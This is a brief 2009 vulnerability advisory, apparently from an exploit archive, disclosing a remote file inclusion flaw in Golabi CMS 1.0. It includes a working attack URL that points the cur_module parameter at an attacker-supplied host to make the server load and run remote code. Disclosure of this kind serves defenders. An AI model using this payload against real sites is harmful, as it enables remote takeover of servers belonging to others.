id: 4889
date: 02/26/2009
title: Golabi CMS Remote File Inclusion Vulnerability
author: CrazyAngel
cves: 

==============================================
Golabi CMS Remote File Inclusion Vulnerability
==============================================


--------------------------------------------------------------------------------

               [Golabi CMS Remote File Inclusion Vulnerability]

[+] Application Info:
    [*] Name:       Golabi CMS
    [*] Author:     R3dM0ve
    [*] HomePage:   http://golabicms.sourceforge.net/
    [*] Download:   http://downloads.sourceforge.net/golabicms/Golabi_1.0.zip?use_mirror=freefr

[+] Vulnerability Info:
    [*] Type:  Remote File Inclusion (RFI)
    [*] Requirement: register_globals [ON]
    [*] Risk:  High Critical
    [*] Bug Hunter: CrazyAngel
    [*] Details: Unhandled variable Inclusion in default template file results in RFI Vulnerability
    [*] Vul URL: [GOLABI_PATH]/templates/default/index_logged.php?main_loaded=1&cur_module=[EVIL_URL]




#  0day.today [2023-03-27]  #